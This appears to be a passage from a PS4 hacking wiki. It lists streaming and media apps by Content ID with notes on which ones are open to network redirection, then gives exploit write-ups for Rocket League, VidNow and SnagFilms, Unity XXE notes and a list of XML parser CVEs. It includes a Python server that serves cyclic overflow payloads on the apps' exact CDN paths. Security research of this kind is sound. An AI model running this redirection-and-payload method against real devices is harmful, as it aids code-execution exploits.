Language: Simplified Chinese, English, Korean, Malay, Thai, Traditional Chinese.
iQIYI is based in Singapore.

WAKANIM
EP8833-CUSA07017_00-WAKANIM000000000
not vulnerable

NFL
UP8905-CUSA03390_00-0000000000000001
CUSA13998
Uses WebMAF on PS4 (1.42).

NFL Game Pass
EP2957-CUSA11621_00-NFLGAMEPASSEN001
CUSA17859

NFL SUNDAY TICKET
UT0028-CUSA00933_00-DIRECTVNFLPS4APP
?not vulnerable?

Virtual Joey
UP2112-CUSA00953_00-ECHOVIRTUALJOEY1 (US)
UP2112-CUSA00959_00-ECHOVIRTUALJOEY1
Uses Trilithium on PS4.
"All Trilithium libraries are built to run on PS4 firmware version 1.750.x"
DISH Network LLC, often referred to as DISH (an abbreviation for Digital Sky Highway), was formerly known as EchoStar Communications Corporation and DISH Network Corporation.

Twitch
UP8902-CUSA03285_00-TWITCHPS4APPSCEA
EP8816-CUSA03398_00-TWITCHPS4APPSCEE
HP8901-CUSA03408_00-TWITCHPS4APPASIA
1.00: Does not require PSN connection. Not vulnerable to redirection.
1.60: Requires PSN connection.

Eros Now
CUSA01143
CUSA01420

ADN
EP8838-CUSA08223_00-ADNSTREAMINGPROD
not vulnerable
ADN stands for Animation Digital Network.

dアニメストア (Docomo Anime Store)
JP6553-CUSA26248_00-DANIMESTORE20212
1.00: Requires PSN connection.

TELEFOOT
CUSA26253 (FR)
Téléfoot: La Chaîne du Foot (English: The Football Channel), also known as simply Téléfoot, was a French pay television channel owned by Mediapro.

カラオケ@DAM
JP1919-CUSA05864_00-0000000000000000

Spotify
EP4950-CUSA01780_00-0000000000000000
Has a DRM Free license.
Requires PSN connection.

EPIX
UT9003-CUSA00098_00-EPIXHD0000001003 (US)
Base package and patch 1.01 require PS4 1.02.

Pluto TV
UP8809-CUSA04688_00-0000000000000001
EP6487-CUSA25431_00-0000000000000001
Uses WebMAF on PS3.

Max
UP2084-CUSA41487_00-0094093457586850
CUSA42548

ESPN
UP1082-CUSA20270_00-0000000000000001

WatchESPN
UP8813-CUSA05214_00-WATCHESPNPS40000

SBS ON DEMAND
EP4355-CUSA00686_00-SBSONF0000DEMAND (AUS)
Uses WebMAF on PS3.

Watchever
EP4378-CUSA00075_00-WATCHEVERFULL000 (Germany)
Publisher: Vivendi Mobile Entertainment SA

Apple TV
UP6366-CUSA24186_00-3916558842004169
EP6365-CUSA24386_00-6058076879904191
JP6285-CUSA24387_00-5680859308778810
HP6352-CUSA24388_00-0328908600007633

PeacockTV / Peacock
CUSA20557
CUSA20558
CUSA20559
UP8862-CUSA20387_00-PEACOCKTVSTPS4US
UP8862-CUSA50221_00-0309462738048841
CUSA44568

Funimation
CUSA02598
UP2203-CUSA01881_00-FUNIMATION123456 (AR, BR, CA, CL, CO, MX, PE, US)
CUSA24752
Uses WebMAF on PS3.

FunimationNow
EP8822-CUSA04858_00-FUNIMATIONNOW000
Uses WebMAF on PS3.

Disney+
UP1082-CUSA15607_00-0000000000000001
EP1006-CUSA15362_00-0000000000000000
CUSA23459
CUSA26917
CUSA33443
CUSA33445
CUSA41720
UP1082-CUSA17204_00-DISNEYPLUSBETA01
EP1006-CUSA17211_00-DISNEYPLUSBETA02
1.00: Does not require PSN connection. Not vulnerable to JS redirection.

Star+ / Alchemy
UP1082-CUSA28107_00-7671418034339914
UP1082-CUSA28332_00-5305941957191875
CUSA41721
Publisher: Disney Interactive Studios

myCANAL
EP6493-CUSA26941_00-5308998485411682 (FR)

FOD
CUSA49264 (JP)

Shahid / MBC Shahid
EP7275-CUSA40504_00-0092658479701111
CUSA29195
CUSA29238
Shahid offers a wide range of Arabic, Turkish, and Bollywood content, live sports coverage, and engaging entertainment for diverse audiences.

Blim
UP8846-CUSA15371_00-BLIM24I24I24I24I

Maxdome
EP4374-CUSA00115_00-MAXDOMEFULLAPP00 (Germany, Austria)
Uses WebMAF on PS3.

JOYN
EP4374-CUSA20658_00-JOYNLOVESDUCKS12

CBS NEWS
UP8815-CUSA05455_00-1001952457212975
Uses WebMAF on PS3.

CBS ALL ACCESS
UP8815-CUSA05365_00-CBSIALLACCESSPS4
Replaced by Paramount+.

TotalChannel
EP4419-CUSA00119_00-TOTALCHANNELFULL (Spain)

All 4
EP4449-CUSA00072_00-CHANNEL404OD0100 (UK)
Publisher: Channel 4 Ltd.
https://en.wikipedia.org/wiki/Channel_Four_Television_Corporation
Uses WebMAF on PS3.

NBA
UP8824-CUSA06566_00-NBAUSPS4TDBS0002
UP8832-CUSA06996_00-NBAINTERNATIONAL

NBA App
EP7470-CUSA30916_00-8836715750790605

NBA_PS4_QA_Beta / NBA App Beta
UP8832-CUSA42505_00-0173475854859593

NBA Rakuten
JA0016-CUSA17492_00-NBARAKUTEN000001

NBA Game Time
UP9002-CUSA00214_00-NBAGAMETIMEAPP00 (ARG, BRA, CAN, CHI, DOM, MEX, JP, US)
HA0002-CUSA00272_00-NBAGAMETIMEAPP00
Another name is NBA League Pass.

360Channel
JP3168-CUSA07366_00-0000000000000000

NHL.TV
UP9002-CUSA00241_00-NHLGAMECENTERPS4
UT0026-CUSA00448_00-NHLGAMECENTERPS4 (CAN, US)
CUSA24952
Another name is NHL GameCenter / NHL GameCenter LIVE.

MLB.TV
UT0016-CUSA00529_00-MLB0000000000001
UP0181-CUSA01974_00-MLBTVPS4US000001 (CAN, MEX, US)
HT0006-CUSA00881_00-MLB0000000000001
CUSA12144
MLB stands for Major League Baseball.
Base package of the US version requires PS4 System Software 2.00 or lower.

JOYSOUND.TV Plus
JP0033-CUSA01039_00-JOYSOUND00001DSK (JP)
JP0033-CUSA01040_00-JOYSOUND000001DL (JP)

Qello Concerts
UT0021-CUSA00489_00-QELLO20130905001 (US)
EP4482-CUSA00696_00-QELLO20140814000 (UK)
Base package of the EU version requires PS4 System Software 2.50 or lower.
Base package of the US version requires PS4 System Software 3.50 or lower.

DAZN
UP8835-CUSA09505_00-PERFORMGROUP2016
EP8819-CUSA04225_00-PERFORMGROUP2016
EP8819-CUSA12373_00-PERFORMGROUP2016
JA0014-CUSA04681_00-PERFORMGROUP2016
CUSA12348
CUSA13444
CUSA13445
Uses WebMAF on PS3.

DAZN Beta
JA0014-CUSA05372_00-PERFORMGROUP2016
CUSA05769
Uses WebMAF on PS3.

ITVX
EP2488-CUSA46706_00-0795101898528822

ITVX Beta PS4
EP2488-CUSA46902_00-0383265784502709

TubiTV
UP8834-CUSA08686_00-TUBITVPS40000000
EP8397-CUSA37642_00-6958188345238050
Uses WebMAF on PS3.

U-NEXT
JA0018-CUSA08077_00-UNEXT00000000PS4
1.00: Requires PSN connection.

Hulu
UT0008-CUSA00131_00-TESSERACT0000001 (AR, BR, CA, CL, CO, MX, PE, US)
JA0002-CUSA00399_00-JP0FINAL0000HULU (JP)
CUSA07728
CUSA25618
CUSA25660

VUDU™ Movies & TV
UT0015-CUSA00096_00-VUDU000000000000 (US)

Cinépolis Klic
UP2191-CUSA01553_00-CINEPOLISKLICPS4
Uses WebMAF on PS3.

BBC iPlayer
EP4338-CUSA00122_00-IPLAYER0FULL0000 (UK)
Uses WebMAF on PS3.

BBC News
EP4338-CUSA00273_00-BBCNEWSAPPPS4000 (UK)
Uses WebMAF on PS3.

BBC Sport
EP4338-CUSA00116_00-BBCSPORTSAPPPS40 (UK)
Uses WebMAF on PS3.

UFC Fight Pass
UP7808-CUSA35488_00-UFCFIGHTPASSPS4A
EP7806-CUSA35489_00-UFCFIGHTPASSPS4E
JP7789-CUSA40221_00-0904559566457615
UP7808-CUSA39356_00-8604406226113266
HP7835-CUSA40222_00-0246437331084134
1.00: Requires PSN connection.

UEFA.tv
UP6546-CUSA25007_00-9386431800228708
EP6545-CUSA24969_00-1931314736371726
JP6475-CUSA25008_00-2869502240368023
HP6543-CUSA25009_00-0677080904111109
1.00: Requires PSN connection.

CuriosityStream
UP6945-CUSA27570_00-8560825383884612
UP6945-CUSA27570_00-8560825383884666
EP6940-CUSA27673_00-2096736853346212
JP6908-CUSA27674_00-8991006826220300
HP6960-CUSA27675_00-0070467990501643

KinoPoisk
EP6561-CUSA25137_00-7980329373497494 (RU)
Publisher: Yandex LLC
KinoPoisk is a Russian subscription-based video-on-demand streaming service.

Crave
UP6552-CUSA25039_00-0226330061472406 (CAN)
Crave is a Canadian subscription-based video-on-demand streaming service, formerly known as CraveTV.

Optus Sport
EP6635-CUSA25743_00-2189903847317811 (Australia)
CUSA44440
Publisher: SINGTEL OPTUS PTY LTD
Optus Sport was an Australian group of sports channels, owned by Optus.

Eurosport Player
EP8844-CUSA10874_00-EUROSPORTPS40000

discovery+ / Stream TV Shows
EP8844-CUSA40527_00-0274016613257404

Ginx
CUSA04052
https://ginx.tv

AquaTV
EP0803-CUSA06950_00-1000000000AQUATV
UP0806-CUSA09672_00-1000000000AQUATV
CUSA07227

RTL+ / RTLHU
EB0462-CUSA44858_00-0696802195477560

Molotov
EP8826-CUSA33293_00-8959089505093987
CUSA05419

Fox Sports Now
CUSA06217

Within
EP2869-CUSA07204_00-WITHINUNLIMITED4
UP8820-CUSA05883_00-WITHINUNLIMITED4

Allumette
EP2893-CUSA06821_00-PENROSEALLUMETTE
UP8818-CUSA05884_00-PENROSEALLUMETTE
HP8910-CUSA06558_00-PENROSEALLUMETTE

Aquarion EVOL
JP1610-CUSA06827_00-AQUARIONVRPLUS00

ROGERS ANYPLACE TV
CUSA05366

bilibili (Simplified Chinese)
HP7587-CUSA37195_00-9940123657245032
Theoretically available on the Chinese PS Store.

Player Feedback Program
UP0006-CUSA05171_00-MADDENNFL17BETA1

E3
UP9000-CUSA00752_00-PLAYSTATIONATE30
E3 2014

francetv sport
EP8828-CUSA05696_00-FRANCETVSPORT000

Mad TV
CUSA01481

Al Jazeera
CUSA01484

Powers (TV Show)
EP9000-CUSA01755_00-0000000000000000

SiriusXM Radio
UP8814-CUSA05068_00-SIRIUSXMRADIOPS4
Uses WebMAF on PS3.

HKTV Television
HT5002-CUSA01980_00-HKTV000000000001 (HK)

UKTV
CUSA03115

AOL On
UP2208-CUSA01987_00-AOLON20150112001
Uses WebMAF on PS3.

Viafree
EP4345-CUSA18229_00-4685259000338822
Viaplay Group previously operated Viafree, a free ad-supported streaming service (AVOD) in Denmark, Finland, Norway and Sweden. On 29 November 2021, NENT Group announced that Viafree would become part of Paramount Global (under Pluto TV).

Paramount+
CUSA27830
CBS All Access and Paramount+ are both streaming services owned by ViacomCBS, offering a wide range of content including TV shows, movies, and original programming. While CBS All Access primarily focuses on CBS network content, Paramount+ expands its library to include content from other ViacomCBS-owned networks such as MTV, Nickelodeon, and Comedy Central.

Eurogamer
CUSA02061

RTVE +tdp
EP4490-CUSA03741_00-00000TELEDEPORTE (Spain)

Screambox
UP8803-CUSA03846_00-SCREAMBOXPS42015

tenplay
CUSA07788 (Australia)
10 (formerly, and commonly, referred to as Tenplay or 10 Play) is an Australian free video-on-demand and catch-up TV service run by Network 10.
https://en.wikipedia.org/wiki/10_(VoD_service)

AMPYA
CUSA04130 (Germany)
AMPYA was an Internet-based music video platform with a range of about 130,000 titles, which was operated by TVRL GmbH, which belongs to ProSiebenSat.1 Media and is based in Cologne (Germany) and operationally belonged to MyVideo. The service was available via web browser, mobile devices and the HbbTV service of the ProSiebenSat.1 broadcasting group.
https://www.p3-ds.com

Sportsnet
UP8838-CUSA11301_00-SPORTSNETPS00000

GoPro
UP8807-CUSA04180_00-GOPROAPPPS400000

shomi
UP8808-CUSA04223_00-SHOMIPS4APP00000

HollyStar
CUSA05143

NBC Sports
UP8839-CUSA11553_00-NBCUAPPSPORTSPS4

SHOWTIME
UP8863-CUSA20592_00-SHOWTIMEOTT00001

Showtime Anytime
UP8863-CUSA20593_00-SHOWTIMEANYTIME1

RaiPlay
EB0192-CUSA43569_00-0995285609837835

Premium Online
CUSA03852

Premium Play
CUSA03876

BT Sport
EP8846-CUSA14890_00-2819123350041251
BT Sport was rebranded into TNT Sports.

Anime Japan - AJ Night 2016 - PlayStation Plus Edition
JP9002-CUSA05081_00-MUSICAJNIGHT2016

Perfect
EP4114-CUSA06951_00-PERFECT000000000
UP2985-CUSA06957_00-ASIAPERFECT00000
UP2985-CUSA06957_00-JPPS400000000001
UP2985-CUSA06957_00-PERFECT000000000

Premium Musical Notes: Japan Studio Music Festival
JP9002-CUSA09075_00-JS2DVOL000000001
JP9002-CUSA10122_00-JS2DVOL000000002
JP9002-CUSA10122_00-ASIA000000000000

Star Chart
CUSA10395

Gundam Build Fighters: Battlogue
CUSA12617
EP0700-CUSA12618_00-GBFBTL0000000001
JP0700-CUSA12833_00-GBFBTL0000000001
HP0700-CUSA12832_00-GBFBTL0000000001
UP0700-CUSA12754_00-GBFBTL0000000001
Anime series as an application for PS4.

NNNN - Original Soundtrack
UP6347-CUSA33774_00-NNNNORSOUNDTRACK
EP6346-CUSA33940_00-NNNNSOUNDTRACKEU

Ars Regia OST
UP6347-CUSA33954_00-ARSREGIASNDTRACK
EP6346-CUSA33955_00-ARSREGIASNDTRKEU

Internal applications:

Inside Playstation
EP8945-CUSA07357_00-INSIDEPLAYSTATIO

Trend Micro Web Security Service
UT0014-CUSA01471_00-B000000000001097
UT0014-CUSA01471_00-TRIAL10000000000
EP4536-CUSA01491_00-TRIAL00000000001
EP4536-CUSA01491_00-BUNDLE0000000001
JA0007-CUSA01482_00-ASIA000000BUNDLE
JA0007-CUSA01482_00-ASIA0000000TRIAL

Media Player
IP9100-CUSA02012_00-PS4MEDIAPLAYER00

THE PLAYROOM
IP9100-CUSA00001_00-PLAYROOM00000000
Has a DRM Free license.

SHAREfactory™
IP9100-CUSA00572_00-JPSFRELE00000000 (JP)
IP9100-CUSA00572_00-ASIASFRELE000100 (HK, ID, KR, MY, SG, TW, TH)
IP9100-CUSA00572_00-SFRELE0000000100 (AR, BR, CA, CL, CO, MX, PE, US)
IP9100-CUSA00572_00-EURELE0000000100 (AU, BH, BE, BG, HR, CY, CZ, DK, DE, ES, FI, FR, GB, GR, HU, IS, IN, IE, IL, IT, KW, LB, LU, MT, NL, NZ, NO, AT, OM, PL, PT, QA, RO, RU, SA, CH, SE, SK, SI, TR, UA, AE, ZA)

SHAREfactory™ Dev
IP9100-NPXS27009_00-SFEDIT0000000100
Has a DRM Free license.

Sony Crackle - Free Movies and TV
US0007-CUSA00059_00-CRACKLEPS4TRILIT (CAN, MEX, US)
US0007-CUSA09314_00-CRACKLPS4ALWZSVD
CUSA43433
CUSA43434
Uses Trilithium.

WEBMAF_DEFAULT
EP9009-CUSA00061_00-WEBMAF000DEFAULT
Publisher: SCEE R&D
Uses WebMAF.

Sony Pictures Core
CUSA44892
UB0287-CUSA44977_00-NEXUSSPHE0000000
UB0287-CUSA44977_00-0209674748851116
CUSA44978
CUSA44979
CUSA44980
Uses WebKit.
https://www.sonypicturescore.com
https://www.playstation.com/en-us/sony-pictures-core

BRAVIA TV Player
JA0001-CUSA02215_00-BRAVIATVPLAYER01
EP4288-CUSA02106_00-BRAVIATVPLAYER01
HA0001-CUSA03878_00-BRAVIATVPLAYER01

PlayStation™HEROES
UP9000-CUSA01087_00-GAMINGFORGOOD015

PlayStation® Access
EP9000-CUSA02464_00-PSACCESSAPP00000

PlayStation™Vue
UT0016-CUSA00960_00-COBRAPCKGE000000 
User-Agent: Mozilla/5.0 (PLAYSTATION 4;1.00)
Has a DRM Free license.
Requires PSN connection and network connection.
https://web.archive.org/web/20160302084629/https://www.playstation.com/en-us/network/vue
https://web.archive.org/web/20190723063849/https://www.playstation.com/en-us/network/vue

PlayStation Now
IP9100-CUSA01697_00-SFPROD0000000000.pkg

Cloud TV Test
UT0016-CUSA00644_00-COBRAPCKGE000000
Probably has a DRM Free license.
Patch 1.01 requires PS4 1.70; the base package requires an even lower version.

torne™ PlayStation®4
JA0003-CUSA00442_00-TORNEPS400000000

PlayMemories Online
JA0001-CUSA00256_00-PLAYMEMORIES0001 (JP)
HA0001-CUSA00354_00-PLAYMEMORIES0001 (HK, ID, KR, MY, SG, TW, TH)
UT0014-CUSA01263_00-PLAYMEMORIES0001 (AR, BR, CA, CL, CO, MX, PE, US)
EP4288-CUSA00423_00-PLAYMEMORIES0001 (AU BH BE BG HR CY CZ DK DE ES FI FR GB GR HU IS IN IE IL IT KW LB LU MT NL NZ NO AT OM PL PT QA RO RU SA CH SE SK SI TR UA AE ZA)
CUSA00351

Live Events Viewer
UT0016-CUSA00658_00-0000000000000000 (US)
Patch 1.06 requires PS4 3.00; the base package requires an even lower version (1.70?).
Uses libjscore on PS3.

Conversations with Creators
UT0016-CUSA03141_00-CONVOSWICREATORS

PDP Cloud Remote App
CUSA10091
CUSA10889
UP2520-CUSA10894_00-CLOUDRMTAPP00000
EP2383-CUSA14586_00-CLOUDRMTAPP00000
The Cloud Remote uses Bluetooth® wireless technology to manage media playback of PS4 streaming and live apps, and includes controls for power, input, and volume for TVs. Programming the remote is straightforward with the downloadable PDP Cloud Remote App, which uses advanced Cloud technology to auto-detect devices connected to the PS4 for hassle-free remote programming.
Formerly: https://www.pdp.com/cloud-remote
https://support.turtlebeach.com/s/article/Cloud-Remote-for-PlayStation-4-User-Guide
https://turtlebeach.my.salesforce.com/sfc/p/#U0000000Jga6/a/UR000003o8S5/k0oTed5cKC7.EEUQcbEUDSrxsS.xaVHeXA5qLHkoBQU
https://www.youtube.com/watch?v=8WHsSI9pRgM

File redirection with impact

SnagFilms

A vulnerability is present in the SnagFilms application, downloadable from the PS Store in regions AR, BR, CA, CL, CO, MX, PE, US. Its Content ID is UP2156-CUSA01206_00-SNAGFILMPS4RC001.

Loading an arbitrary payload into the application's memory has been demonstrated, although so far the application throws an exception before the payload finishes loading.

If you craft a small enough payload and/or a payload that loads without causing an exception in program memory, you can most likely get usermode code execution.

https://www.psdevwiki.com/ps4/File:5OrSFCa.jpg

BattleCars Exploit (Buffer Overflow via network in Rocket League)

At the time, a buffer overflow affected the most recent application version of Rocket League (1.03), even on the latest System Software version of the time (2.57).

First, block all requests to https://patch103-dot-psyonix-rl.appspot.com/

When you launch Rocket League, it downloads a stub file from http://psyonix-rl-529970.c.cdn77.org/BC2/versions/103/config/BattleCars_Prod/client.bin

You can redirect this URL so that the game loads a huge file and/or a specifically crafted payload instead of the stub. With a suitable file it does not need to be that large: the example file is under 9 MB.

Your file is loaded into memory. Once the file is large enough, a match is played and/or you wait long enough, you can consistently trigger a buffer overflow and the application crashes.

Depending on how you craft your payload, you may not have to do any of that to get it working. No checks at all are performed on the file's size, contents, etc.

Staying on the start screen for long enough can also trigger it. If the payload is not crafted properly, it takes much longer to trigger.

If you have problems getting this working, the example file causes an almost instant buffer overflow upon launch of the application.

With a properly crafted payload, you should be able to trigger it within 10-20 seconds of launching the application.

A carefully crafted file may be able to exploit this or similar bugs to gain code execution, among other things. It may also be possible to alter gameplay via similar methods.

No payload is provided at the moment because this is very experimental.

VidNow (TCP Buffer Overflow)

A possible exploit has been found in the VidNow (or VidZone?) application downloadable from the PS Store.

  • UT4071-CUSA00237_00-0000000000000000 (Australia, NZ)
  • EP4071-CUSA00235_00-0000000000000000 (Austria, Belgium, Denmark, Finland, France, Germany, Ireland, Italy, Luxembourg, Netherlands, Norway, Portugal, Spain, Sweden, Switzerland, UK)

PATCHED: Sony has hotfixed this exploit by hashing the content while in transit: the PS4 now verifies the file against a content hash carried in an HMAC HTTP header. Some people have managed to reverse the hotfix but the method is not public.

When you launch VidNow for the first time it fetches http://sceecatalogs.vidzone.tv/386/vidzone_386_US.db.psarc (or http://sceecatalogs.vidzone.tv/469/vidzone_469_US.db.psarc, depending on the version). This file is 5 MB and is received through a 60 kB TCP buffer. Before the hotfix, no checks were done at all on the file's size, hash or contents, so VidNow could be redirected to load a substitute file.

When VidNow is redirected to a large enough file, the TCP window buffer is overrun somewhere between bytes 34,125,000 and 35,000,000 of the substitute file. Despite the buffer overflow and crash, the substitute data is still transmitted, and the application only throws the exception when another TCP packet is sent. As a result, the application crashes and the console locks up for about a minute. Directly before the console resumes normal operation after the crash, an unusually large number of TCP RST packets are sent.

While no exploit that makes use of this crash is currently available, a carefully crafted file may be able to exploit this or similar issues to gain usermode ROP code execution, among other things.

Crash Timeline

17:17:39.899984000 Request
17:17:40.000655000 Request
17:17:40 (System locks up) Crash
17:17:44.957274000 Response
17:17:48.500481000 Response
17:17:48.500567000 Response
17:17:50.356427000 (System no longer locked up) Console Regains Control (74 byte packet sent)
17:17:50.357555000 Contacts Crashlog Server / System Operation Resumes
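
Both the Rocket League and the VidNow write-ups above rely on the same redirection step: make the hostname the application resolves point at a machine you control, then answer the exact path with a substitute file and let everything else fail. The following is an added example written for this page, not code from the wiki, Psyonix, Sony or VidZone. It is a minimal HTTP server that answers the three paths quoted above and returns 404 for anything else, including any request addressed to the Rocket League patch host. Rather than an opaque blob, the substitute file is a de Bruijn cyclic pattern: once the application faults, the bytes found at the faulting address or in a clobbered register can be mapped back to an offset in the file, which is how one would narrow down the 34,125,000 to 35,000,000 byte window reported for VidNow. Hostnames, paths and approximate sizes come from the text; the pattern alphabet, the window length N and the listening port are my assumptions.

```python
"""Substitute-file HTTP server with a cyclic payload (added example, not wiki or vendor code)."""
import http.server
import itertools
import string

# Pattern alphabet and window length are my choices: any alphabet works as long as
# every N-byte window of the pattern is unique, which is what makes offsets recoverable.
ALPHABET = (string.ascii_uppercase + string.ascii_lowercase + string.digits).encode()
N = 5  # 62**5 distinct windows is far more than the ~35 MB the VidNow overrun needs


def _de_bruijn(alphabet: bytes, n: int):
    """Lazily yield the de Bruijn sequence B(len(alphabet), n), one byte value at a time."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, alphabet: bytes = ALPHABET, n: int = N) -> bytes:
    """First `length` bytes of the pattern (shorter only if length exceeds len(alphabet)**n)."""
    return bytes(itertools.islice(_de_bruijn(alphabet, n), length))


def cyclic_find(needle: bytes, alphabet: bytes = ALPHABET, n: int = N, limit: int = 64 << 20) -> int:
    """Offset of the first n bytes of `needle` in the pattern, or -1 if not found within `limit` bytes.

    Feed it the bytes sitting at the faulting address or in a clobbered register after the crash.
    """
    if len(needle) < n:
        raise ValueError(f"need at least {n} bytes to identify a window")
    key = bytes(needle[:n])
    window = bytearray()
    for i, b in enumerate(_de_bruijn(alphabet, n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if window == key:
            return i - n + 1
        if i >= limit:
            break
    return -1


# Paths quoted in the write-ups above, mapped to the size of substitute file to serve.
SUBSTITUTES = {
    "/BC2/versions/103/config/BattleCars_Prod/client.bin": 8 << 20,  # Rocket League: under 9 MB suffices
    "/386/vidzone_386_US.db.psarc": 35_000_000,                      # VidNow: overrun seen before byte 35,000,000
    "/469/vidzone_469_US.db.psarc": 35_000_000,
}
BLOCKED_HOSTS = {"patch103-dot-psyonix-rl.appspot.com"}  # Rocket League patch check must not succeed


class SubstituteHandler(http.server.BaseHTTPRequestHandler):
    """Serve the cyclic pattern for known paths, 404 for everything else."""
    cache: dict = {}  # size -> generated pattern, shared across requests

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        if host in BLOCKED_HOSTS or self.path not in SUBSTITUTES:
            self.send_error(404)
            return
        size = SUBSTITUTES[self.path]
        if size not in self.cache:
            self.cache[size] = cyclic(size)
        body = self.cache[size]
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Point the console's DNS for the hostnames above at this machine first (port 80 needs root).
    http.server.HTTPServer(("0.0.0.0", 80), SubstituteHandler).serve_forever()
```

Run it as root (port 80) on the machine that the console resolves the cdn77.org / vidzone.tv hostnames to, for instance through a DNS server of your own entered in the PS4 network settings. The 35 MB pattern is generated in pure Python on the first request and takes a while; it is cached afterwards. After the crash, paste the bytes seen in the debugger into cyclic_find() to obtain the offset in the file that reached the overrun.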

File injection without impact

Headset Companion
EP9000-CUSA00468_00-HEADSETCOMPANION
UP9000-CUSA00372_00-HEADSETCOMPANION
JP9002-CUSA05062_00-HEADSETCOMPANION
HP9010-CUSA03386_00-HEADSETCOMPANION
User-Agent: PS4Application libhttp/1.000 (PS4) libhttp/6.51 (PlayStation 4)
Vulnerable to .json and .xml file injection.

Crunchyroll
UP2074-CUSA00095_00-201310082029XXXX (ARG, BRA, CAN, CHL, COL, MEX, PER, US)
EP8805-CUSA02644_00-20150410XCRUNCHY
CUSA39533
CUSA39534
User-Agent: PS4Application libhttp/1.000 (PS4) libhttp/6.51 (PlayStation 4)
Vulnerable to .txt file injection.

VRV
UP8826-CUSA06551_00-20161004AAAABBBB
VRV was a subscription video streaming service that included on-demand access to a large library of anime titles and cult favourites. All of its content now lives at Crunchyroll.
https://www.youtube.com/watch?v=CX5bAmt3I-M

PlayStation® F.C.
EP9000-CUSA02865_00-0000000000000000
User-Agent for images: SCEE/cm (PLAYSTATION 4;1.00) libhttp/6.51 (PlayStation 4)
User-Agent for PSARC: Tonga (PLAYSTATION 4;1.00) libhttp/6.51 (PlayStation 4)
Not vulnerable, or only to injection of the JSON embedded in the PSARC.
http://scee.dl.playstation.net.edgesuite.net/psfc/catalogue2.master.psarc
The PSARC embeds JSON.

RCE in Neverwinter Nights: Enhanced Edition multiplayer mode

Neverwinter Nights: Enhanced Edition is a game available on the PS4 PS Store.

Its Content ID is UP0346-CUSA15670_00-NWNEEONCOLSOLEPS for the American version and EP0343-CUSA15938_00-NWNEEONCOLSOLEPS for the European version.

It is unknown whether the PS4 version of Neverwinter Nights: Enhanced Edition has a multiplayer mode that can be hijacked like the PC version of the game.

Usermode (WebKit)

See WebKit Bugs.

Usermode (untested attack vectors)

Leap second 23:59:60 software bug

The leap second of 2015 June 30, 23h 59m 60s should theoretically not be a problem, since the PS4 OS is based on FreeBSD, which can represent 23:59:60.

How many seconds are in a day? If you guessed 86,400, you’d be right—except on June 30, 2015, when an extra second is being added to the clock. This additional unit of time, dubbed a “leap second,” is meant to account for a naturally-occurring slowing of the Earth’s rotation. But the extra second could cause headaches for computer systems, which aren’t ready to deal with 61 seconds in a given minute.

The problem is reminiscent of Y2K, that turn-of-the-century panic when companies worried their computers would go haywire because they recognized the year 2000’s double-zero ending as “1900.”

While no one is predicting this year’s leap second to cause a tech apocalypse like they did fifteen years ago, there’s a chance the leap second could crash your favorite website or maybe even delay your flight.

Oldest games and applications

The oldest games and applications may have ASLR disabled, just like on PS Vita (see the h-encore exploit), which would make exploitation easier.

See also PKG_files#Oldest_packages.

Contrast

  • Contrast (CUSA00011) requires PS4 System Software 1.02. It has no disc version but is still available on the PS Store to buy a license. Contrast uses Unreal Engine 3, the precursor of Unreal Engine 4, which was also used a lot for PS3 games, including some exploitable ones.

Unity game engine

System.Xml.XmlTextReader

Unity uses the .NET 2.0 API, and XmlTextReader in every .NET version prior to 4.5.2 processes DTDs and resolves external entities by default, so it is vulnerable to XML External Entity (XXE) attacks: if you can get user-controlled input into one of these readers you get XXE. On runtimes where the options exist, the mitigation is DtdProcessing = DtdProcessing.Prohibit (ProhibitDtd = true on older ones) together with XmlResolver = null.

Various Unity bugs

XML: libxml2

libxml2 is one of the most widely used software libre XML parsers.

  • Used in PS4 [3]
  • Source code [4]

Notable vulnerabilities fixed in libxml2

CVE-2025-24928

libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a stack-based buffer overflow in xmlSnprintfElements in valid.c. To exploit this, DTD validation must occur for an untrusted document or untrusted DTD. NOTE: this is similar to CVE-2017-9047.

CVE-2013-0338 / CVE-2013-0339

Credits:

  • Sebastian Pipping (hartwork)
  • CVE-2013-0338 - libxml2 internal entity expansion
  • CVE-2013-0339 - libxml2 external entities expansion

XML: Expat XML Parser

libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C (specifically C99). It is cross-platform and licensed under the MIT license.

Notable vulnerabilities fixed in Expat XML

CVE-2024-8176

A stack overflow vulnerability exists in the libexpat library due to the way it handles recursive entity expansion in XML documents. When parsing an XML document with deeply nested entity references, libexpat can be forced to recurse indefinitely, exhausting the stack space and causing a crash. This issue could lead to denial of service (DoS) or, in some cases, exploitable memory corruption, depending on the environment and library usage.

Fixed in Expat XML 2.7.0.

CVE-2022-25315

Credits:

  • Samanta Navarro (ferivoz)

In Expat XML, an integer overflow in storeRawNames can be used for out-of-bounds heap writes. The default configuration is affected. If compiled with XML_UNICODE then the attack does not work.

Fixed in Expat XML 2.4.5.

CVE-2022-25313

Credits:

  • Samanta Navarro (ferivoz)

In libexpat before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element.

Fixed in Expat XML 2.4.5.

CVE-2022-25235 / CVE-2022-25236 - Expat XML insufficiently sanitizes tag and attribute names

CVE-2022-25235: xmltok_impl.c in libexpat before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context.

CVE-2022-25236: xmlparse.c in libexpat before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs.

Fixed in Expat XML 2.4.5.

CVE-2022-23852

Expat XML has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES (the default build).

Fixed in Expat XML 2.4.4.

CVE-2022-22822

addBinding in xmlparse.c in libexpat before 2.4.3 has an integer overflow.

